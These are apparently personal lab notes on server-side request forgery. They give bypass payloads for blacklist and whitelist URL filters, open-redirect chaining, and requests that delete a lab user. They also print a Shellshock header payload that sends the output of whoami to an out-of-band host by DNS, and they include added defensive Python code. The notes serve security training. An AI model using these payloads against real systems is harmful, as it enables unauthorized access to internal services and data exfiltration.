[TOC]
# SSRF Attack
Necessary condition!
-> We can make the web application launch an HTTP request from the website's own IP address
Potential attack vector
- API endpoint (used for a query)
## Server -> loopback Interface

Sample
```
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1
```
stockApi -> parameter (it's an SSRF attack vector)
**It allows the web application to launch the HTTP request !!!**
Exploit
```
stockApi=http://localhost/admin
```
### Reasons the request is implicitly trusted
1. Access control sits in front of the application, so a request that originates from the server itself never passes through it
2. The machine allows local-user access without login
3. The admin panel listens on a port that differs from the web application's
### LAB - Basic SSRF: bypass admin access control (localhost)
Target: access http://localhost/admin and delete carlos
#### Recon
Mapping web site structure

#### Analysis Attack Surface
Dynamic URL

Check the stock -> HTTP request !!
`/product/stock`
#### Identify
Evaluate `/product/stock`

Poc
```
stockApi=http://127.0.0.1/
```

The website returns the admin panel, which confirms an SSRF vulnerability that lets us access the admin panel.
#### Exploit
Delete the carlos account
```
stockApi=http://127.0.0.1/admin/delete?username=carlos
```


Solved !
## Back-end Systems

### LAB Back-end systems - private IP enumeration
Target: 192.168.0.X, port 8080, /admin panel
#### Recon
Mapping web site structure

#### Analysis Attack Surface
Dynamic URL

#### Identify
Evaluate `/product/stock`
Potential SSRF attack vector

Original Request
```
stockApi=http://192.168.0.1:8080/product/stock/check?productId=1&storeId=1
```

192.168.0.244 -> suspicious private IP (host up)
```
stockApi=http://192.168.0.244:8080
```

#### Exploit
Exploit the SSRF to delete the user
```
http://192.168.0.244:8080/admin/delete?username=carlos
```


Solved !
# Circumventing Defense
## Blacklist Bypass
### Alternative representations of 127.0.0.1
```
2130706433
017700000001
127.1
```
### DNS -> 127.0.0.1
```
localtest.me
customer1.app.localhost.my.company.127.0.0.1.nip.io
127.0.0.1.nip.io
spoofed.burpcollaborator.net
```
### Obfuscation
- URL encoding
- Case variation
```
admin -> aDmin, Admin
admin-> %61dmin
```
### Open Redirect
Provide a URL we control that redirects to the target URL.
Once the redirect procedure performs some extra action, such as
-> adding an extra header // Nginx-Redirect: /127.0.0.1/admin
-> switching the protocol // https -> http
it may allow an attacker to bypass the filter.
### LAB Bypass SSRF defense (blacklist)
#### Recon
Mapping web site structure

#### Analysis Attack Surface
Dynamic URL

#### Identify
Evaluated endpoint: `/product/stock`

Potential SSRF Vector
```
stockApi=http://stock.weliketoshop.net:8080/product/stock/check?productId=1&storeId=1
```
The loopback interface is blocked
```
stockApi=http://127.0.0.1
```

Determine whether the filter is a whitelist or a blacklist
```
stockApi=http://meowhecker
```

Not blocked -> an arbitrary host name is not blocked !!!
-> It is probably a blacklist filter
Attempt DNS bypass
```
localtest.me
customer1.app.localhost.my.company.127.0.0.1.nip.io
127.0.0.1.nip.io
spoofed.burpcollaborator.net
```

Fails
Attempt 2
```
2130706433
017700000001
127.1
```

According to the response -> 127.1 bypasses the SSRF defender
```
http://127.1/admin
```

I guess the defender looks like this
```
// guessed filter (pseudocode): only the literal path 'admin' triggers the wordlist check
if (page == 'admin') {
    accessControl(url.filter(wordlist))
}
```
#### Using URL encoding or upper/lower-case letters to bypass the defender
```
http://127.1/admin
```
Blocked
Upper-case A
```
http://127.1/Admin
```

Success !!
There is an SSRF vulnerability.
#### Exploit
Exploit the SSRF vulnerability to delete the carlos account
```
http://127.0.1/Admin/delete?username=carlos
```


Solved !!
## SSRF with whitelist-based input filter
### Bypass methods
The core concept is to insert the 'valid host name' into the URL to bypass validation.
Way 1: login (userinfo) format
```
http://username:password@yoursitename.com
```
```
https://expected-host:password@evil-host
```
Way 2: hash (fragment)
```
https://evil-host#expected-host-name
```
Note: sometimes the hash is stripped (replaced with an empty string '') when the application parses the URL;
we can double-encode the hash so that it is not stripped.
Way 3: subdomain
```
https://expectedHostName.evil-Host
```
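The three whitelist tricks above and the alternative spellings of 127.0.0.1 from the blacklist section both defeat filters that compare strings instead of parsing the URL and resolving the host. The following is an added example, not code from these notes or from the lab, showing the two naive filters side by side with a check that parses the URL, pins the host name exactly, rejects userinfo, normalises numeric hosts through `inet_aton`, and only then judges the address. The `FAKE_DNS` table is a constructed stand-in for real resolution so that the example runs offline; the host names and the 93.184.216.34 address in it are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed resolver table so the example runs offline. A real service would
# call socket.getaddrinfo and apply the same check to every address returned.
FAKE_DNS = {
    "stock.weliketoshop.net": "93.184.216.34",   # constructed public address
    "localtest.me": "127.0.0.1",                 # public names that point inward
    "127.0.0.1.nip.io": "127.0.0.1",
}

EXPECTED_HOSTS = {"stock.weliketoshop.net"}   # the only host the stock check needs
BLACKLIST = ("127.0.0.1", "localhost")        # the sort of filter the lab uses


def naive_blacklist_allows(url):
    """String blacklist on the raw URL: exactly what 127.1 and localtest.me slip past."""
    return not any(bad in url.lower() for bad in BLACKLIST)


def naive_whitelist_allows(url):
    """Substring whitelist on the raw URL: fooled by userinfo, '#' and subdomains."""
    return any(host in url for host in EXPECTED_HOSTS)


def resolve_host(host, resolver):
    """Return the address the socket layer would actually connect to."""
    # inet_aton accepts the same shorthand forms as the C library
    # (decimal '2130706433', octal '017700000001', '127.1'), so normalising
    # through it catches every representation a string compare misses.
    try:
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except OSError:
        pass
    try:
        return ipaddress.ip_address(host)     # IPv6 literal such as ::1
    except ValueError:
        pass
    resolved = resolver(host)                 # anything else is a DNS name
    if resolved is None:
        raise ValueError(f"cannot resolve {host!r}")
    return ipaddress.ip_address(resolved)


def is_safe_destination(url, allowed_hosts=None, resolver=FAKE_DNS.get):
    """Parse first, pin the host, then judge the address it resolves to."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme not in ("http", "https"):
        return False
    if parts.username is not None or parts.password is not None:
        return False          # kills 'expected-host:pw@evil-host'
    host = parts.hostname     # already stripped of userinfo, port and '#...'
    if not host:
        return False
    if allowed_hosts is not None and host not in allowed_hosts:
        return False          # exact match, so '#' and subdomain tricks fail
    try:
        addr = resolve_host(host, resolver)
    except (OSError, ValueError):
        return False
    # Even an allowlisted name must not land in internal space.
    return addr.is_global and not addr.is_multicast
```

Two design points matter in practice. The decision is made on the host, never on the path, so case games such as `/Admin` have nothing to work with. And because a name can change between check and connect (DNS rebinding), the same address test should also run on the address the HTTP client is about to connect to, and again on every redirect hop.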
### LAB: SSRF with whitelist-based input filter
Vulnerable feature: "Stock check functionality"
Goal: -> reach the internal server through SSRF
#### Site Map

#### Dynamic parameters

This endpoint passes a URL as a parameter, so an SSRF vulnerability probably exists.
Normal request

```
http://stock.weliketoshop.net:8080/product/stock/check?productId=20&storeId=1
```
Out-of-band testing
```
http://2run5llugo2gzl4ulyvm133cw32uqke9.oastify.com
```


If we add `stock.weliketoshop.net`, the request is not blocked by the filter
### Bypass the whitelist
Whitelist - part of the URL must match this pattern.
```
http%3a%2f%2fstock.weliketoshop.net
```

Analysis
Attempt embedding the login format
-> Determine whether the website supports this mechanism

It supports the embedded login format.
```
http://meow:meow@stock.weliketoshop.net
```
Attempt 1
```
http://stock.weliketoshop.net:stock.weliketoshop.net@127.0.0.1
```

Does not work
Attempt 2
```
http://meow#meow:meow@stock.weliketoshop.net
```

Attempting to double-encode '#'
to avoid '#' being replaced !

Payload
```
http://meow%23meow:meow@stock.weliketoshop.net
```
Works
### Exploit
Attempt to access the localhost page
```
http%3a//127.0.0.1%2523meow%3ameow%40stock.weliketoshop.net
```

Attempting to access the admin panel
```
http://127.0.0.1/admin%23meow:meow@stock.weliketoshop.net
```
```
http%3a//127.0.0.1/admin/%2523meow%3ameow%40stock.weliketoshop.net
```
(fail) we can try merging the two approaches to pass our malicious payload

Merged approach
```
http://127.0.0.1#meow:meow@stock.weliketoshop.net/admin
http%3a//127.0.0.1%2523meow%3ameow%40stock.weliketoshop.net/admin
```


## Bypassing SSRF filter via open redirection
URL redirection == URL forwarding
301 status (permanent redirect)

302 status (temporary redirect)
### Requirement
The back-end API supports open redirection
**Open Redirect Vulnerability**
```php=
<?php
// Open redirect: $path comes straight from the query string and is placed
// into the Location header without any validation.
if (user_login()) {
    $path = $_GET['path'];
    header("Location: " . $path);
    exit;
}
```

We can control the path parameter !
Sometimes we can add %0a%0d to inject arbitrary HTTP headers. (Exploit proxy)
```
http://example.com/login?redirect=http://malicious-site.com
```
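The chain described here has two weak points: the redirecting endpoint reflects `path` into `Location` unchecked, and the stock-check client validates only the URL it was given and then follows whatever redirect comes back. The example below is added here and is not code from these notes or from the lab; it models both ends in one place. `FAKE_SERVER`, `ATTACK_URL`, `NORMAL_URL` and the responses in them are constructed so the example runs offline; the host name `stock.weliketoshop.net` is taken from the notes, everything else is an assumption.

```python
from urllib.parse import urljoin, urlsplit

ALLOWED_HOSTS = {"stock.weliketoshop.net"}   # what the stock-check URL filter permits
REDIRECT_STATUSES = {301, 302, 303, 307, 308}
MAX_HOPS = 3

# Constructed stand-in for the network: URL -> (status, Location header, body).
# The first entry models the open redirect: an allowed host whose 'path'
# parameter is echoed straight into the Location header.
ATTACK_URL = ("http://stock.weliketoshop.net/product/nextProduct"
              "?currentProductId=1&path=http://127.0.0.1/admin")
NORMAL_URL = "http://stock.weliketoshop.net/product/stock/check?productId=1&storeId=1"
FAKE_SERVER = {
    ATTACK_URL: (302, "http://127.0.0.1/admin", ""),
    "http://127.0.0.1/admin": (200, None, "<h1>Admin panel</h1>"),
    NORMAL_URL: (200, None, "42 units"),
}


def host_allowed(url):
    return urlsplit(url).hostname in ALLOWED_HOSTS


def fetch_validate_once(url, transport=FAKE_SERVER.get):
    """Insecure pattern: check the URL once, then let the client follow redirects."""
    if not host_allowed(url):
        raise ValueError(f"blocked: {url}")
    for _ in range(MAX_HOPS + 1):
        status, location, body = transport(url) or (502, None, "")
        if status in REDIRECT_STATUSES and location:
            url = urljoin(url, location)      # no re-check: the server picks the hop
            continue
        return status, url, body
    raise ValueError("too many redirects")


def fetch_validate_each_hop(url, transport=FAKE_SERVER.get):
    """Hardened client: every hop passes the same host check before it is requested."""
    for _ in range(MAX_HOPS + 1):
        if not host_allowed(url):
            raise ValueError(f"blocked: {url}")
        status, location, body = transport(url) or (502, None, "")
        if status in REDIRECT_STATUSES and location:
            url = urljoin(url, location)
            continue
        return status, url, body
    raise ValueError("too many redirects")


def safe_redirect_path(path):
    """Fix on the redirecting endpoint: accept only a same-origin relative path."""
    if "\r" in path or "\n" in path:          # raw CRLF would let the caller add headers
        return None
    if not path.startswith("/") or path[1:2] in ("/", "\\"):
        return None                           # '//host' and '/\host' are scheme-relative
    parts = urlsplit(path)
    if parts.scheme or parts.netloc:
        return None
    return path
```

With a real HTTP client the equivalent of `fetch_validate_each_hop` is to disable automatic redirects and loop over `Location` yourself, applying the destination check (host allowlist plus resolved-address check) to every hop.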
### LAB: SSRF filter bypass via open redirection vulnerability
#### Site map

#### Dynamic parameter
```
/product/nextProduct?currentProductId=1&path=/product?productId=2
```


Open redirection
```
POST /product/stock
```
API endpoint


```
http://127.0.0.1
```

```
/127.0.0.1
```

According to the response, we can infer that the website does not allow "http" in the query string
#### Bypass the 'HTTP' input filter

```
2fproduct/nextProduct?currentProductId=1&path=/product?productId=2
```

Works
#### Exploit
```
/product/nextProduct?currentProductId=1&path=http://127.0.0.1
```

Admin panel !


Solved
# Blind SSRF vulnerability
When the back-end response is not returned in the application's front-end response, we call it blind SSRF
Impact
-> RCE
## Identify - Blind SSRF
The basic way is to use an out-of-band technique -> Burp Collaborator
We can observe the DNS lookup to learn whether the back-end service attempted to make the HTTP request
## Exploit
We can use blind SSRF to scan the internal IP address space,
or to send well-known Auth-RCE payloads
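From the defender's side, a blind SSRF used to scan internal address space has a distinctive shape in egress logs: one application host contacting many distinct RFC 1918 or loopback addresses in a short burst, mostly with error statuses. The example below is added here and is not code from these notes; it runs a sliding-window detector over constructed egress-proxy log lines. The log format, the host names `app-01`/`app-02`, the 192.168.0.0/24 addresses and the thresholds are all assumptions.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed egress-proxy log lines: "<timestamp> <app host> <destination host:port> <status>".
# app-01 is being driven through a blind SSRF to sweep 192.168.0.0/24 on port 8080;
# app-02 legitimately talks to one internal stock API host; one external call is mixed in.
SWEEP = [f"2024-05-01T10:00:{i:02d}Z app-01 192.168.0.{i}:8080 502" for i in range(1, 31)]
NORMAL = [f"2024-05-01T10:00:{i:02d}Z app-02 192.168.0.1:8080 200" for i in range(0, 60, 5)]
EXTERNAL = ["2024-05-01T10:00:07Z app-01 stock.weliketoshop.net:8080 200"]
EGRESS_LOG = SWEEP + NORMAL + EXTERNAL


def parse_line(line):
    """Return (timestamp, client, destination address or None, status)."""
    ts, client, dest, status = line.split()
    host = dest.rsplit(":", 1)[0]
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        addr = None                       # a DNS name, not a literal address
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), client, addr, int(status)


def find_internal_sweeps(lines, window=timedelta(seconds=60), threshold=10):
    """Flag clients that contact many distinct internal addresses within one window."""
    events = defaultdict(list)
    for line in lines:
        ts, client, addr, _status = parse_line(line)
        if addr is not None and (addr.is_private or addr.is_loopback):
            events[client].append((ts, addr))

    alerts = []
    for client, evs in events.items():
        evs.sort()
        best, start = 0, 0
        for end in range(len(evs)):       # sliding window over the sorted events
            while evs[end][0] - evs[start][0] > window:
                start += 1
            best = max(best, len({a for _, a in evs[start:end + 1]}))
        if best >= threshold:
            alerts.append({"client": client, "distinct_internal_hosts": best})
    return alerts
```

This catches the sweep, not the single out-of-band lookup used to confirm the bug; for that, the complementary signal is DNS queries from application servers for domains they never otherwise contact.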

Blind SSRF + Command Injection

### LAB - Blind SSRF + Command injection
#### SiteMap

#### Dynamic Parameter
```
GET /product?productId=1 HTTP/2
```

### Identify SSRF vulnerability


The web page does not return the Burp Collaborator response

This is a blind SSRF vulnerability !
### Exploit
Attempt command injection
->
```
User-Agent: () { :; }; /usr/bin/nslookup $(whoami).re9csa8j3dp5marj8nibosq1jspjdf14.oastify.com
```
Enumerate IP
```
Reference: http://192.168.0.1:8080
```


OS Name: peter-Tf6vWQ

Owner 侯智晟-meowheckerouo@gmail.com